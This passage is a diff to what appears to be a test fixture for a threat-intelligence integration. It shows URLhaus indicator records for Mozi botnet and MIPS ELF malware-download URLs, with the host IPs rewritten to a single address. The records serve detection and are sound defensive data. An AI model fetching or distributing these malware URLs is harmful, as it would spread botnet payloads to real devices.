listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10966,18 +10966,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://101.20.171.255:44103/Mozi.a", + "original": "http://89.160.20.156:44103/Mozi.a", "scheme": "http", "port": 44103, - "domain": "101.20.171.255", - "full": "http://101.20.171.255:44103/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44103/Mozi.a" }, - "ip": "101.20.171.255" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693358371Z", - "original": "{\"id\":\"961318\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961318/\",\"url\":\"http://101.20.171.255:44103/Mozi.a\",\"url_status\":\"online\",\"host\":\"101.20.171.255\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026118300Z", + "original": "{\"id\":\"961318\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961318/\",\"url\":\"http://89.160.20.156:44103/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11015,18 +11015,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.211.62.72:36257/Mozi.m", + "original": "http://89.160.20.156:36257/Mozi.m", "scheme": "http", "port": 36257, - "domain": "117.211.62.72", - "full": "http://117.211.62.72:36257/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36257/Mozi.m" }, - "ip": "117.211.62.72" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693361557Z", - "original": "{\"id\":\"961319\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961319/\",\"url\":\"http://117.211.62.72:36257/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.211.62.72\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026125200Z", + "original": "{\"id\":\"961319\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961319/\",\"url\":\"http://89.160.20.156:36257/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11065,18 +11065,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://115.55.179.98:41921/bin.sh", + "original": "http://89.160.20.156:41921/bin.sh", "scheme": "http", "port": 41921, - "domain": "115.55.179.98", - "full": "http://115.55.179.98:41921/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41921/bin.sh" }, - "ip": "115.55.179.98" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693365415Z", - "original": "{\"id\":\"961317\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961317/\",\"url\":\"http://115.55.179.98:41921/bin.sh\",\"url_status\":\"online\",\"host\":\"115.55.179.98\",\"date_added\":\"2021-01-14 19:45:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026132200Z", + "original": "{\"id\":\"961317\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961317/\",\"url\":\"http://89.160.20.156:41921/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:45:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11114,18 +11114,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://182.113.226.63:50971/i", + "original": "http://89.160.20.156:50971/i", "scheme": "http", "port": 50971, - "domain": "182.113.226.63", - "full": "http://182.113.226.63:50971/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50971/i" }, - "ip": "182.113.226.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693368571Z", - "original": "{\"id\":\"961316\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961316/\",\"url\":\"http://182.113.226.63:50971/i\",\"url_status\":\"online\",\"host\":\"182.113.226.63\",\"date_added\":\"2021-01-14 19:44:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026170200Z", + "original": "{\"id\":\"961316\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961316/\",\"url\":\"http://89.160.20.156:50971/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:44:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11163,18 +11163,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.39.120:56339/Mozi.m", + "original": "http://89.160.20.156:56339/Mozi.m", "scheme": "http", "port": 56339, - "domain": "59.96.39.120", - "full": "http://59.96.39.120:56339/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56339/Mozi.m" }, - "ip": "59.96.39.120" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693379221Z", - "original": "{\"id\":\"961315\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961315/\",\"url\":\"http://59.96.39.120:56339/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.39.120\",\"date_added\":\"2021-01-14 19:36:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026178200Z", + "original": "{\"id\":\"961315\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961315/\",\"url\":\"http://89.160.20.156:56339/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11212,18 +11212,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.15.198.146:52551/Mozi.m", + "original": "http://89.160.20.156:52551/Mozi.m", "scheme": "http", "port": 52551, - "domain": "221.15.198.146", - "full": "http://221.15.198.146:52551/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52551/Mozi.m" }, - "ip": "221.15.198.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693385653Z", - "original": "{\"id\":\"961314\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961314/\",\"url\":\"http://221.15.198.146:52551/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.15.198.146\",\"date_added\":\"2021-01-14 19:36:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026185200Z", + "original": "{\"id\":\"961314\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961314/\",\"url\":\"http://89.160.20.156:52551/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11261,18 +11261,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.126.93.114:35942/Mozi.m", + "original": "http://89.160.20.156:35942/Mozi.m", "scheme": "http", "port": 35942, - "domain": "182.126.93.114", - "full": "http://182.126.93.114:35942/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35942/Mozi.m" }, - "ip": "182.126.93.114" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693390542Z", - "original": "{\"id\":\"961312\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961312/\",\"url\":\"http://182.126.93.114:35942/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.93.114\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026192200Z", + "original": "{\"id\":\"961312\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961312/\",\"url\":\"http://89.160.20.156:35942/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11310,18 +11310,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://188.19.182.164:39636/Mozi.a", + "original": "http://89.160.20.156:39636/Mozi.a", "scheme": "http", "port": 39636, - "domain": "188.19.182.164", - "full": "http://188.19.182.164:39636/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39636/Mozi.a" }, - "ip": "188.19.182.164" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693394319Z", - "original": "{\"id\":\"961313\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961313/\",\"url\":\"http://188.19.182.164:39636/Mozi.a\",\"url_status\":\"online\",\"host\":\"188.19.182.164\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026199100Z", + "original": "{\"id\":\"961313\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961313/\",\"url\":\"http://89.160.20.156:39636/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11359,18 +11359,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.0.6.131:53548/Mozi.m", + "original": "http://89.160.20.156:53548/Mozi.m", "scheme": "http", "port": 53548, - "domain": "59.0.6.131", - "full": "http://59.0.6.131:53548/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53548/Mozi.m" }, - "ip": "59.0.6.131" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693397846Z", - "original": "{\"id\":\"961310\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961310/\",\"url\":\"http://59.0.6.131:53548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.0.6.131\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026205900Z", + "original": "{\"id\":\"961310\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961310/\",\"url\":\"http://89.160.20.156:53548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11408,18 +11408,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://45.160.145.247:40967/Mozi.m", + "original": "http://89.160.20.156:40967/Mozi.m", "scheme": "http", "port": 40967, - "domain": "45.160.145.247", - "full": "http://45.160.145.247:40967/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40967/Mozi.m" }, - "ip": "45.160.145.247" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693401042Z", - "original": "{\"id\":\"961311\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961311/\",\"url\":\"http://45.160.145.247:40967/Mozi.m\",\"url_status\":\"online\",\"host\":\"45.160.145.247\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026212900Z", + "original": "{\"id\":\"961311\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961311/\",\"url\":\"http://89.160.20.156:40967/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11457,18 +11457,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.195:49471/Mozi.m", + "original": "http://89.160.20.156:49471/Mozi.m", "scheme": "http", "port": 49471, - "domain": "186.33.104.195", - "full": "http://186.33.104.195:49471/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49471/Mozi.m" }, - "ip": "186.33.104.195" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693404127Z", - "original": "{\"id\":\"961309\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961309/\",\"url\":\"http://186.33.104.195:49471/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.195\",\"date_added\":\"2021-01-14 19:36:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026219700Z", + "original": "{\"id\":\"961309\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961309/\",\"url\":\"http://89.160.20.156:49471/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11506,18 +11506,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.172.5:43937/Mozi.m", + "original": "http://89.160.20.156:43937/Mozi.m", "scheme": "http", "port": 43937, - "domain": "42.224.172.5", - "full": "http://42.224.172.5:43937/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43937/Mozi.m" }, - "ip": "42.224.172.5" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693407474Z", - "original": "{\"id\":\"961302\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961302/\",\"url\":\"http://42.224.172.5:43937/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.172.5\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026226500Z", + "original": "{\"id\":\"961302\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961302/\",\"url\":\"http://89.160.20.156:43937/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11555,18 +11555,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.126.89.215:57992/Mozi.a", + "original": "http://89.160.20.156:57992/Mozi.a", "scheme": "http", "port": 57992, - "domain": "182.126.89.215", - "full": "http://182.126.89.215:57992/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57992/Mozi.a" }, - "ip": "182.126.89.215" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693410870Z", - "original": "{\"id\":\"961303\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961303/\",\"url\":\"http://182.126.89.215:57992/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.126.89.215\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026233400Z", + "original": "{\"id\":\"961303\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961303/\",\"url\":\"http://89.160.20.156:57992/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11604,18 +11604,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.219.111.198:43603/Mozi.m", + "original": "http://89.160.20.156:43603/Mozi.m", "scheme": "http", "port": 43603, - "domain": "27.219.111.198", - "full": "http://27.219.111.198:43603/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43603/Mozi.m" }, - "ip": "27.219.111.198" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693414256Z", - "original": "{\"id\":\"961304\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961304/\",\"url\":\"http://27.219.111.198:43603/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.219.111.198\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026240400Z", + "original": "{\"id\":\"961304\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961304/\",\"url\":\"http://89.160.20.156:43603/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11653,18 +11653,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.219.76.18:37157/Mozi.a", + "original": "http://89.160.20.156:37157/Mozi.a", "scheme": "http", "port": 37157, - "domain": "27.219.76.18", - "full": "http://27.219.76.18:37157/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37157/Mozi.a" }, - "ip": "27.219.76.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693417503Z", - "original": "{\"id\":\"961305\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961305/\",\"url\":\"http://27.219.76.18:37157/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.219.76.18\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026247200Z", + "original": "{\"id\":\"961305\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961305/\",\"url\":\"http://89.160.20.156:37157/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11702,18 +11702,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://185.246.178.200:37229/Mozi.m", + "original": "http://89.160.20.156:37229/Mozi.m", "scheme": "http", "port": 37229, - "domain": "185.246.178.200", - "full": "http://185.246.178.200:37229/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37229/Mozi.m" }, - "ip": "185.246.178.200" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693420729Z", - "original": "{\"id\":\"961306\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961306/\",\"url\":\"http://185.246.178.200:37229/Mozi.m\",\"url_status\":\"online\",\"host\":\"185.246.178.200\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026254200Z", + "original": "{\"id\":\"961306\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961306/\",\"url\":\"http://89.160.20.156:37229/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11751,18 +11751,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.136.88.171:49104/Mozi.m", + "original": "http://89.160.20.156:49104/Mozi.m", "scheme": "http", "port": 49104, - "domain": "222.136.88.171", - "full": "http://222.136.88.171:49104/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49104/Mozi.m" }, - "ip": "222.136.88.171" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693424395Z", - "original": "{\"id\":\"961307\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961307/\",\"url\":\"http://222.136.88.171:49104/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.136.88.171\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026261400Z", + "original": "{\"id\":\"961307\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961307/\",\"url\":\"http://89.160.20.156:49104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11800,18 +11800,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.53.193.78:49575/Mozi.m", + "original": "http://89.160.20.156:49575/Mozi.m", "scheme": "http", "port": 49575, - "domain": "61.53.193.78", - "full": "http://61.53.193.78:49575/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49575/Mozi.m" }, - "ip": "61.53.193.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693427702Z", - "original": "{\"id\":\"961308\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961308/\",\"url\":\"http://61.53.193.78:49575/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.53.193.78\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026268400Z", + "original": "{\"id\":\"961308\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961308/\",\"url\":\"http://89.160.20.156:49575/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11849,18 +11849,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://112.234.38.83:50000/Mozi.a", + "original": "http://89.160.20.156:50000/Mozi.a", "scheme": "http", "port": 50000, - "domain": "112.234.38.83", - "full": "http://112.234.38.83:50000/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50000/Mozi.a" }, - "ip": "112.234.38.83" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693431048Z", - "original": "{\"id\":\"961299\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961299/\",\"url\":\"http://112.234.38.83:50000/Mozi.a\",\"url_status\":\"online\",\"host\":\"112.234.38.83\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026275300Z", + "original": 